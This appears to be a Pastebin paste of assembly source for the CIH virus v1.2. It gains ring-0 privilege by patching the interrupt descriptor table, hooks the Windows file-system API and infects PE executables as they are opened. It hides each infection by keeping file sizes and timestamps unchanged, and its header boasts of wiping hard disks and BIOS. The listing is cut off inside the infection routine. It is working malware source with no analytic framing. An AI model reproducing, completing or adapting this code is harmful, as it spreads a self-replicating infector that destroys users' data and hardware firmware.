API tools faq
paste
crazykid_ceh

kid project

crazykid_ceh
May 2nd, 2014
181
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 51.91 KB | None | 0 0
raw download clone embed print report
  1. ****************************************************************************
  2.  
  3. ; * The Virus Program Information *
  4. ;
  5. ****************************************************************************
  6.  
  7. ; *
  8. *
  9. ; * Designer : CIH Original Place : TTIT of Taiwan *
  10. ; * Create Date : 04/26/1998 Now Version : 1.2 *
  11. ; * Modification Time : 05/21/1998
  12. *
  13. ; * *
  14. ;
  15. *==========================================================================*
  16.  
  17. ; * Modification History *
  18. ;
  19. *==========================================================================*
  20.  
  21. ; * v1.0 1. Create the Virus Program. *
  22. ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
  23. ; * 04/26/1998 3. Virus Code doesn't Reload into System.
  24. *
  25. ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
  26. ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
  27. ; * 6. When System Opens Existing PE File, the File will be *
  28. ; * Infected, and the File doesn't be Reinfected.
  29. *
  30. ; * 7. It is also Infected, even the File is Read-Only. *
  31. ; * 8. When the File is Infected, the Modification Date and Time *
  32. ; * of the File also don't be Changed. *
  33. ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
  34. ; * Previous FileSystemApiHook, it will Call the Function *
  35. ; * that the IFS Manager Would Normally Call to Implement *
  36. ; * this Particular I/O Request. *
  37. ; * 10. The Virus Size is only 656 Bytes. *
  38. ;
  39. *==========================================================================*
  40.  
  41. ; * v1.1 1. Especially, the File that be Infected will not Increase *
  42. ; * it's Size... ^__^ *
  43. ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
  44. ; * When Exception Error Occurs, Our OS System should be in *
  45. ; * Windows NT. So My Cute Virus will not Continue to Run, *
  46. ; * it will Jmup to Original Application to Run. *
  47. ; * 3. Use Better Algorithm, Reduce Virus Code Size. *
  48. ; * 4. The Virus "Basic" Size is only 796 Bytes. *
  49. ;
  50. *==========================================================================*
  51.  
  52. ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
  53. ; * 2. Modify the Bug of v1.1 *
  54. ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
  55. ;
  56. ****************************************************************************
  57.  
  58.  
  59. .586P
  60.  
  61. ;
  62. ****************************************************************************
  63.  
  64. ; * Original PE Executable File(Don't Modify this Section)
  65. *
  66. ;
  67. ****************************************************************************
  68.  
  69.  
  70. OriginalAppEXE SEGMENT
  71.  
  72. FileHeader:
  73. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
  74. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
  75. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  76. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  77. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  78. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  79. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  80. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
  81. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
  82. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
  83. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
  84. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
  85. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
  86. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
  87. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
  88. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  89. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
  90. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
  91. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
  92. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
  93. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  94. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  95. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
  96. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  97. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  98. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  99. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
  100. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
  101. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  102. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  103. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
  104. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  105. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  106. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  107. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  108. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  109. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  110. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  111. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  112. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  113. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  114. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  115. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  116. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  117. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  118. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  119. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  120. db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
  121. db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  122. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  123. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  124. db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
  125. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  126. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  127. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  128. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  129. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  130. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  131. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  132. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  133. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  134. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  135. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  136. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  137. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  138. dd 00000000h, VirusSize
  139.  
  140. OriginalAppEXE ENDS
  141.  
  142. ;
  143. ****************************************************************************
  144.  
  145. ; * My Virus Game
  146. *
  147. ;
  148. ****************************************************************************
  149.  
  150.  
  151. ; *********************************************************
  152. ; * Constant Define *
  153. ; *********************************************************
  154.  
  155. TRUE = 1
  156. FALSE = 0
  157. DEBUG = TRUE
  158. MajorVirusVersion = 1
  159. MinorVirusVersion = 2
  160. VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
  161.  
  162. IF DEBUG
  163. FirstKillHardDiskNumber = 81h
  164. HookExceptionNumber = 05h
  165. ELSE
  166. FirstKillHardDiskNumber = 80h
  167. HookExceptionNumber = 03h
  168. ENDIF
  169.  
  170. FileNameBufferSize = 7fh
  171. ; *********************************************************
  172. VirusGame SEGMENT
  173. ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
  174. ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
  175. ; *********************************************************
  176. ; * Ring3 Virus Game Initial Program *
  177. ; *********************************************************
  178. MyVirusStart:
  179. push ebp
  180. ; *************************************
  181. ; * Let's Modify Structured Exception *
  182. ; * Handing, Prevent Exception Error *
  183. ; * Occurrence, Especially in NT. *
  184. ; *************************************
  185. lea eax, [esp-04h*2]
  186. xor ebx, ebx
  187. xchg eax, fs:[ebx]
  188. call @0
  189. @0:
  190. pop ebx
  191. lea ecx, StopToRunVirusCode-@0[ebx]
  192. push ecx
  193. push eax
  194. ; *************************************
  195. ; * Let's Modify *
  196. ; * IDT(Interrupt Descriptor Table) *
  197. ; * to Get Ring0 Privilege... *
  198. ; *************************************
  199. push eax ;
  200. sidt [esp-02h] ; Get IDT Base Address
  201. pop ebx ;
  202. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  203. cli
  204. mov ebp, [ebx] ; Get Exception Base
  205. mov bp, [ebx-04h] ; Entry Point
  206. lea esi, MyExceptionHook-@1[ecx]
  207. push esi
  208. mov [ebx-04h], si ;
  209. shr esi, 16 ; Modify Exception
  210. mov [ebx+02h], si ; Entry Point Address
  211. pop esi
  212. ; *************************************
  213. ; * Generate Exception to Get Ring0 *
  214. ; *************************************
  215. int HookExceptionNumber ; GenerateException
  216. ReturnAddressOfEndException = $
  217. ; *************************************
  218. ; * Merge All Virus Code Section *
  219. ; *************************************
  220. push esi
  221. mov esi, eax
  222. LoopOfMergeAllVirusCodeSection:
  223. mov ecx, [eax-04h]
  224. rep movsb
  225. sub eax, 08h
  226. mov esi, [eax]
  227. or esi, esi
  228. jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  229. jmp LoopOfMergeAllVirusCodeSection
  230. QuitLoopOfMergeAllVirusCodeSection:
  231. pop esi
  232. ; *************************************
  233. ; * Generate Exception Again *
  234. ; *************************************
  235. int HookExceptionNumber ; GenerateException Again
  236. ; *************************************
  237. ; * Let's Restore *
  238. ; * Structured Exception Handing *
  239. ; *************************************
  240. ReadyRestoreSE:
  241. sti
  242. xor ebx, ebx
  243. jmp RestoreSE
  244. ; *************************************
  245. ; * When Exception Error Occurs, *
  246. ; * Our OS System should be in NT. *
  247. ; * So My Cute Virus will not *
  248. ; * Continue to Run, it Jmups to *
  249. ; * Original Application to Run. *
  250. ; *************************************
  251. StopToRunVirusCode:
  252. @1 = StopToRunVirusCode
  253. xor ebx, ebx
  254. mov eax, fs:[ebx]
  255. mov esp, [eax]
  256. RestoreSE:
  257. pop dword ptr fs:[ebx]
  258. pop eax
  259. ; *************************************
  260. ; * Return Original App to Execute *
  261. ; *************************************
  262. pop ebp
  263. push 00401000h ; Push Original
  264. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
  265. ret ; Return to Original App Entry Point
  266. ; *********************************************************
  267. ; * Ring0 Virus Game Initial Program *
  268. ; *********************************************************
  269. MyExceptionHook:
  270. @2 = MyExceptionHook
  271. jz InstallMyFileSystemApiHook
  272. ; *************************************
  273. ; * Do My Virus Exist in System !? *
  274. ; *************************************
  275. mov ecx, dr0
  276. jecxz AllocateSystemMemoryPage
  277. add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
  278. ; *************************************
  279. ; * Return to Ring3 Initial Program *
  280. ; *************************************
  281. ExitRing0Init:
  282. mov [ebx-04h], bp ;
  283. shr ebp, 16 ; Restore Exception
  284. mov [ebx+02h], bp ;
  285. iretd
  286. ; *************************************
  287. ; * Allocate SystemMemory Page to Use *
  288. ; *************************************
  289. AllocateSystemMemoryPage:
  290. mov dr0, ebx ; Set the Mark of My Virus Exist in System
  291. push 00000000fh ;
  292. push ecx ;
  293. push 0ffffffffh ;
  294. push ecx ;
  295. push ecx ;
  296. push ecx ;
  297. push 000000001h ;
  298. push 000000002h ;
  299. int 20h ; VMMCALL _PageAllocate
  300. _PageAllocate = $ ;
  301. dd 00010053h ; Use EAX, ECX, EDX, and flags
  302. add esp, 08h*04h
  303. xchg edi, eax ; EDI = SystemMemory Start Address
  304. lea eax, MyVirusStart-@2[esi]
  305. iretd ; Return to Ring3 Initial Program
  306. ; *************************************
  307. ; * Install My File System Api Hook *
  308. ; *************************************
  309. InstallMyFileSystemApiHook:
  310. lea eax, FileSystemApiHook-@6[edi]
  311. push eax ;
  312. int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
  313. IFSMgr_InstallFileSystemApiHook = $ ;
  314. dd 00400067h ; Use EAX, ECX, EDX, and flags
  315. mov dr0, eax ; Save OldFileSystemApiHook Address
  316. pop eax ; EAX = FileSystemApiHook Address
  317.  
  318. ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
  319. mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
  320. mov edx, [ecx]
  321. mov OldInstallFileSystemApiHook-@3[eax], edx
  322.  
  323. ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
  324. lea eax, InstallFileSystemApiHook-@3[eax]
  325. mov [ecx], eax
  326.  
  327. cli
  328. jmp ExitRing0Init
  329. ; *********************************************************
  330. ; * Code Size of Merge Virus Code Section *
  331. ; *********************************************************
  332. CodeSizeOfMergeVirusCodeSection = offset $
  333. ; *********************************************************
  334. ; * IFSMgr_InstallFileSystemApiHook *
  335. ; *********************************************************
  336. InstallFileSystemApiHook:
  337. push ebx
  338. call @4 ;
  339. @4: ;
  340. pop ebx ; mov ebx, offset FileSystemApiHook
  341. add ebx, FileSystemApiHook-@4 ;
  342. push ebx
  343. int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
  344. IFSMgr_RemoveFileSystemApiHook = $
  345. dd 00400068h ; Use EAX, ECX, EDX, and flags
  346. pop eax
  347.  
  348. ; Call Original IFSMgr_InstallFileSystemApiHook
  349. ; to Link Client FileSystemApiHook
  350. push dword ptr [esp+8]
  351. call OldInstallFileSystemApiHook-@3[ebx]
  352. pop ecx
  353. push eax
  354.  
  355. ; Call Original IFSMgr_InstallFileSystemApiHook
  356. ; to Link My FileSystemApiHook
  357. push ebx
  358. call OldInstallFileSystemApiHook-@3[ebx]
  359. pop ecx
  360. mov dr0, eax ; Adjust OldFileSystemApiHook Address
  361. pop eax
  362. pop ebx
  363. ret
  364. ; *********************************************************
  365. ; * Static Data *
  366. ; *********************************************************
  367. OldInstallFileSystemApiHook dd ?
  368. ; *********************************************************
  369. ; * IFSMgr_FileSystemHook *
  370. ; *********************************************************
  371.  
  372. ; *************************************
  373. ; * IFSMgr_FileSystemHook Entry Point *
  374. ; *************************************
  375. FileSystemApiHook:
  376. @3 = FileSystemApiHook
  377. pushad
  378. call @5 ;
  379. @5: ;
  380. pop esi ; mov esi, offset
  381. VirusGameDataStartAddress
  382. add esi, VirusGameDataStartAddress-@5
  383. ; *************************************
  384. ; * Is OnBusy !? *
  385. ; *************************************
  386. test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
  387. jnz pIFSFunc ; goto pIFSFunc
  388. ; *************************************
  389. ; * Is OpenFile !? *
  390. ; *************************************
  391. ; if ( NotOpenFile )
  392. ; goto prevhook
  393. lea ebx, [esp+20h+04h+04h]
  394. cmp dword ptr [ebx], 00000024h
  395. jne prevhook
  396. ; *************************************
  397. ; * Enable OnBusy *
  398. ; *************************************
  399. inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
  400. ; *************************************
  401. ; * Get FilePath's DriveNumber, *
  402. ; * then Set the DriveName to *
  403. ; * FileNameBuffer. *
  404. ; *************************************
  405. ; * Ex. If DriveNumber is 03h, *
  406. ; * DriveName is 'C:'. *
  407. ; *************************************
  408. ; mov esi, offset FileNameBuffer
  409. add esi, FileNameBuffer-@6
  410. push esi
  411. mov al, [ebx+04h]
  412. cmp al, 0ffh
  413. je CallUniToBCSPath
  414. add al, 40h
  415. mov ah, ':'
  416. mov [esi], eax
  417. inc esi
  418. inc esi
  419. ; *************************************
  420. ; * UniToBCSPath *
  421. ; *************************************
  422. ; * This Service Converts *
  423. ; * a Canonicalized Unicode Pathname *
  424. ; * to a Normal Pathname in the *
  425. ; * Specified BCS Character Set. *
  426. ; *************************************
  427. CallUniToBCSPath:
  428. push 00000000h
  429. push FileNameBufferSize
  430. mov ebx, [ebx+10h]
  431. mov eax, [ebx+0ch]
  432. add eax, 04h
  433. push eax
  434. push esi
  435. int 20h ; VXDCall UniToBCSPath
  436. UniToBCSPath = $
  437. dd 00400041h
  438. add esp, 04h*04h
  439. ; *************************************
  440. ; * Is FileName '.EXE' !? *
  441. ; *************************************
  442. ; cmp [esi+eax-04h], '.EXE'
  443. cmp [esi+eax-04h], 'EXE.'
  444. pop esi
  445. jne DisableOnBusy
  446. IF DEBUG
  447. ; *************************************
  448. ; * Only for Debug *
  449. ; *************************************
  450. ; cmp [esi+eax-06h], 'FUCK'
  451. cmp [esi+eax-06h], 'KCUF'
  452. jne DisableOnBusy
  453. ENDIF
  454. ; *************************************
  455. ; * Is Open Existing File !? *
  456. ; *************************************
  457. ; if ( NotOpenExistingFile )
  458. ; goto DisableOnBusy
  459. cmp word ptr [ebx+18h], 01h
  460. jne DisableOnBusy
  461. ; *************************************
  462. ; * Get Attributes of the File *
  463. ; *************************************
  464. mov ax, 4300h
  465. int 20h ; VXDCall IFSMgr_Ring0_FileIO
  466. IFSMgr_Ring0_FileIO = $
  467. dd 00400032h
  468. jc DisableOnBusy
  469. push ecx
  470. ; *************************************
  471. ; * Get IFSMgr_Ring0_FileIO Address *
  472. ; *************************************
  473. mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
  474. mov edi, [edi]
  475. ; *************************************
  476. ; * Is Read-Only File !? *
  477. ; *************************************
  478. test cl, 01h
  479. jz OpenFile
  480. ; *************************************
  481. ; * Modify Read-Only File to Write *
  482. ; *************************************
  483. mov ax, 4301h
  484. xor ecx, ecx
  485. call edi ; VXDCall IFSMgr_Ring0_FileIO
  486. ; *************************************
  487. ; * Open File *
  488. ; *************************************
  489. OpenFile:
  490. xor eax, eax
  491. mov ah, 0d5h
  492. xor ecx, ecx
  493. xor edx, edx
  494. inc edx
  495. mov ebx, edx
  496. inc ebx
  497. call edi ; VXDCall IFSMgr_Ring0_FileIO
  498. xchg ebx, eax ; mov ebx, FileHandle
  499. ; *************************************
  500. ; * Need to Restore *
  501. ; * Attributes of the File !? *
  502. ; *************************************
  503. pop ecx
  504. pushf
  505. test cl, 01h
  506. jz IsOpenFileOK
  507. ; *************************************
  508. ; * Restore Attributes of the File *
  509. ; *************************************
  510. mov ax, 4301h
  511. call edi ; VXDCall IFSMgr_Ring0_FileIO
  512. ; *************************************
  513. ; * Is Open File OK !? *
  514. ; *************************************
  515. IsOpenFileOK:
  516. popf
  517. jc DisableOnBusy
  518. ; *************************************
  519. ; * Open File Already Succeed. ^__^ *
  520. ; *************************************
  521. push esi ; Push FileNameBuffer Address to Stack
  522. pushf ; Now CF = 0, Push Flag to Stack
  523. add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
  524. ; ***************************
  525. ; * Get OffsetToNewHeader *
  526. ; ***************************
  527. xor eax, eax
  528. mov ah, 0d6h
  529.  
  530. ; For Doing Minimal VirusCode's Length,
  531. ; I Save EAX to EBP.
  532. mov ebp, eax
  533. xor ecx, ecx
  534. mov cl, 04h
  535. xor edx, edx
  536. mov dl, 3ch
  537. call edi ; VXDCall IFSMgr_Ring0_FileIO
  538. mov edx, [esi]
  539. ; ***************************
  540. ; * Get 'PE\0' Signature *
  541. ; * of ImageFileHeader, and *
  542. ; * Infected Mark. *
  543. ; ***************************
  544. dec edx
  545. mov eax, ebp
  546. call edi ; VXDCall IFSMgr_Ring0_FileIO
  547. ; ***************************
  548. ; * Is PE !? *
  549. ; ***************************
  550. ; * Is the File *
  551. ; * Already Infected !? *
  552. ; ***************************
  553. ; cmp [esi], '\0PE\0'
  554. cmp dword ptr [esi], 00455000h
  555. jne CloseFile
  556. ; *************************************
  557. ; * The File is ^o^ *
  558. ; * PE(Portable Executable) indeed. *
  559. ; *************************************
  560. ; * The File isn't also Infected. *
  561. ; *************************************
  562.  
  563. ; *************************************
  564. ; * Start to Infect the File *
  565. ; *************************************
  566. ; * Registers Use Status Now : *
  567. ; * *
  568. ; * EAX = 04h *
  569. ; * EBX = File Handle *
  570. ; * ECX = 04h *
  571. ; * EDX = 'PE\0\0' Signature of *
  572. ; * ImageFileHeader Pointer's *
  573. ; * Former Byte. *
  574. ; * ESI = DataBuffer Address ==> @8 *
  575. ; * EDI = IFSMgr_Ring0_FileIO Address *
  576. ; * EBP = D600h ==> Read Data in File *
  577. ; *************************************
  578. ; * Stack Dump : *
  579. ; * *
  580. ; * ESP => ------------------------- *
  581. ; * | EFLAG(CF=0) | *
  582. ; * ------------------------- *
  583. ; * | FileNameBufferPointer | *
  584. ; * ------------------------- *
  585. ; * | EDI | *
  586. ; * ------------------------- *
  587. ; * | ESI | *
  588. ; * ------------------------- *
  589. ; * | EBP | *
  590. ; * ------------------------- *
  591. ; * | ESP | *
  592. ; * ------------------------- *
  593. ; * | EBX | *
  594. ; * ------------------------- *
  595. ; * | EDX | *
  596. ; * ------------------------- *
  597. ; * | ECX | *
  598. ; * ------------------------- *
  599. ; * | EAX | *
  600. ; * ------------------------- *
  601. ; * | Return Address | *
  602. ; * ------------------------- *
  603. ; *************************************
  604. push ebx ; Save File Handle
  605. push 00h ; Set VirusCodeSectionTableEndMark
  606. ; ***************************
  607. ; * Let's Set the *
  608. ; * Virus' Infected Mark *
  609. ; ***************************
  610. push 01h ; Size
  611. push edx ; Pointer of File
  612. push edi ; Address of Buffer
  613. ; ***************************
  614. ; * Save ESP Register *
  615. ; ***************************
  616. mov dr1, esp
  617. ; ***************************
  618. ; * Let's Set the *
  619. ; * NewAddressOfEntryPoint *
  620. ; * ( Only First Set Size ) *
  621. ; ***************************
  622. push eax ; Size
  623. ; ***************************
  624. ; * Let's Read *
  625. ; * Image Header in File *
  626. ; ***************************
  627. mov eax, ebp
  628. mov cl, SizeOfImageHeaderToRead
  629. add edx, 07h ; Move EDX to NumberOfSections
  630. call edi ; VXDCall IFSMgr_Ring0_FileIO
  631. ; ***************************
  632. ; * Let's Set the *
  633. ; * NewAddressOfEntryPoint *
  634. ; * ( Set Pointer of File, *
  635. ; * Address of Buffer ) *
  636. ; ***************************
  637. lea eax, (AddressOfEntryPoint-@8)[edx]
  638. push eax ; Pointer of File
  639. lea eax, (NewAddressOfEntryPoint-@8)[esi]
  640. push eax ; Address of Buffer
  641. ; ***************************
  642. ; * Move EDX to the Start *
  643. ; * of SectionTable in File *
  644. ; ***************************
  645. movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
  646. lea edx, [eax+edx+12h]
  647. ; ***************************
  648. ; * Let's Get *
  649. ; * Total Size of Sections *
  650. ; ***************************
  651. mov al, SizeOfScetionTable
  652. ; I Assume NumberOfSections <= 0ffh
  653. mov cl, (NumberOfSections-@8)[esi]
  654. mul cl
  655. ; ***************************
  656. ; * Let's Set Section Table *
  657. ; ***************************
  658. ; Move ESI to the Start of SectionTable
  659. lea esi, (StartOfSectionTable-@8)[esi]
  660. push eax ; Size
  661. push edx ; Pointer of File
  662. push esi ; Address of Buffer
  663. ; ***************************
  664. ; * The Code Size of Merge *
  665. ; * Virus Code Section and *
  666. ; * Total Size of Virus *
  667. ; * Code Section Table Must *
  668. ; * be Small or Equal the *
  669. ; * Unused Space Size of *
  670. ; * Following Section Table *
  671. ; ***************************
  672. inc ecx
  673. push ecx ; Save NumberOfSections+1
  674. shl ecx, 03h
  675. push ecx ; Save TotalSizeOfVirusCodeSectionTable
  676. add ecx, eax
  677. add ecx, edx
  678. sub ecx, (SizeOfHeaders-@9)[esi]
  679. jnc short OnlySetInfectedMark
  680. not ecx
  681. inc ecx
  682. cmp cx, small CodeSizeOfMergeVirusCodeSection
  683. jb OnlySetInfectedMark
  684. ; ***************************
  685. ; * Save Original *
  686. ; * Address of Entry Point *
  687. ; ***************************
  688. ; Save My Virus First Section Code
  689. ; Size of Following Section Table...
  690. ; ( Not Include the Size of Virus Code Section Table )
  691. push ecx
  692. xchg ecx, eax ; ECX = Size of Section Table
  693. mov eax, (AddressOfEntryPoint-@9)[esi]
  694. add eax, (ImageBase-@9)[esi]
  695. mov (OriginalAddressOfEntryPoint-@9)[esi], eax
  696. ; ***************************
  697. ; * Read All Section Tables *
  698. ; ***************************
  699. mov eax, ebp
  700. call edi ; VXDCall IFSMgr_Ring0_FileIO
  701. ; ***************************
  702. ; * Let's Set Total Virus *
  703. ; * Code Section Table *
  704. ; ***************************
  705. ; EBX = My Virus First Section Code
  706. ; Size of Following Section Table
  707. pop ebx
  708. pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
  709. pop ecx ; ECX = NumberOfSections+1
  710. push edi ; Size
  711. add edx, eax
  712. push edx ; Pointer of File
  713. add eax, esi
  714. push eax ; Address of Buffer
  715. ; ***************************
  716. ; * Set the First Virus *
  717. ; * Code Section Size in *
  718. ; * VirusCodeSectionTable *
  719. ; ***************************
  720. lea eax, [eax+edi-04h]
  721. mov [eax], ebx
  722. ; ***************************
  723. ; * Let's Set My Virus *
  724. ; * First Section Code *
  725. ; ***************************
  726. push ebx ; Size
  727. add edx, edi
  728. push edx ; Pointer of File
  729. lea edi, (MyVirusStart-@9)[esi]
  730. push edi ; Address of Buffer
  731. ; ***************************
  732. ; * Let's Modify the *
  733. ; * AddressOfEntryPoint to *
  734. ; * My Virus Entry Point *
  735. ; ***************************
  736. mov (NewAddressOfEntryPoint-@9)[esi], edx
  737. ; ***************************
  738. ; * Setup Initial Data *
  739. ; ***************************
  740. lea edx, [esi-SizeOfScetionTable]
  741. mov ebp, offset VirusSize
  742. jmp StartToWriteCodeToSections
  743. ; ***************************
  744. ; * Write Code to Sections *
  745. ; ***************************
  746. LoopOfWriteCodeToSections:
  747. add edx, SizeOfScetionTable
  748. mov ebx, (SizeOfRawData-@9)[edx]
  749. sub ebx, (VirtualSize-@9)[edx]
  750. jbe EndOfWriteCodeToSections
  751. push ebx ; Size
  752. sub eax, 08h
  753. mov [eax], ebx
  754. mov ebx, (PointerToRawData-@9)[edx]
  755. add ebx, (VirtualSize-@9)[edx]
  756. push ebx ; Pointer of File
  757. push edi ; Address of Buffer
  758. mov ebx, (VirtualSize-@9)[edx]
  759. add ebx, (VirtualAddress-@9)[edx]
  760. add ebx, (ImageBase-@9)[esi]
  761. mov [eax+4], ebx
  762. mov ebx, [eax]
  763. add (VirtualSize-@9)[edx], ebx
  764.  
  765. ; Section contains initialized data ==> 00000040h
  766. ; Section can be Read. ==> 40000000h
  767. or (Characteristics-@9)[edx], 40000040h
  768. StartToWriteCodeToSections:
  769. sub ebp, ebx
  770. jbe SetVirusCodeSectionTableEndMark
  771. add edi, ebx ; Move Address of Buffer
  772. EndOfWriteCodeToSections:
  773. loop LoopOfWriteCodeToSections
  774. ; ***************************
  775. ; * Only Set Infected Mark *
  776. ; ***************************
  777. OnlySetInfectedMark:
  778. mov esp, dr1
  779. jmp WriteVirusCodeToFile
  780. ; ***************************
  781. ; * Set Virus Code *
  782. ; * Section Table End Mark *
  783. ; ***************************
  784. SetVirusCodeSectionTableEndMark:
  785.  
  786. ; Adjust Size of Virus Section Code to Correct Value
  787. add [eax], ebp
  788. add [esp+08h], ebp
  789.  
  790. ; Set End Mark
  791. xor ebx, ebx
  792. mov [eax-04h], ebx
  793. ; ***************************
  794. ; * When VirusGame Calls *
  795. ; * VxDCall, VMM Modifies *
  796. ; * the 'int 20h' and the *
  797. ; * 'Service Identifier' *
  798. ; * to 'Call [XXXXXXXX]'. *
  799. ; ***************************
  800. ; * Before Writing My Virus *
  801. ; * to File, I Must Restore *
  802. ; * them First. ^__^ *
  803. ; ***************************
  804. lea eax, (LastVxDCallAddress-2-@9)[esi]
  805. mov cl, VxDCallTableSize
  806. LoopOfRestoreVxDCallID:
  807. mov word ptr [eax], 20cdh
  808. mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
  809. mov [eax+2], edx
  810. movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
  811. sub eax, edx
  812. loop LoopOfRestoreVxDCallID
  813. ; ***************************
  814. ; * Let's Write *
  815. ; * Virus Code to the File *
  816. ; ***************************
  817. WriteVirusCodeToFile:
  818. mov eax, dr1
  819. mov ebx, [eax+10h]
  820. mov edi, [eax]
  821. LoopOfWriteVirusCodeToFile:
  822. pop ecx
  823. jecxz SetFileModificationMark
  824. mov esi, ecx
  825. mov eax, 0d601h
  826. pop edx
  827. pop ecx
  828. call edi ; VXDCall IFSMgr_Ring0_FileIO
  829. jmp LoopOfWriteVirusCodeToFile
  830. ; ***************************
  831. ; * Let's Set CF = 1 ==> *
  832. ; * Need to Restore File *
  833. ; * Modification Time *
  834. ; ***************************
  835. SetFileModificationMark:
  836. pop ebx
  837. pop eax
  838. stc ; Enable CF(Carry Flag)
  839. pushf
  840. ; *************************************
  841. ; * Close File *
  842. ; *************************************
  843. CloseFile:
  844. xor eax, eax
  845. mov ah, 0d7h
  846. call edi ; VXDCall IFSMgr_Ring0_FileIO
  847. ; *************************************
  848. ; * Need to Restore File Modification *
  849. ; * Time !? *
  850. ; *************************************
  851. popf
  852. pop esi
  853. jnc IsKillComputer
  854. ; *************************************
  855. ; * Restore File Modification Time *
  856. ; *************************************
  857. mov ebx, edi
  858. mov ax, 4303h
  859. mov ecx, (FileModificationTime-@7)[esi]
  860. mov edi, (FileModificationTime+2-@7)[esi]
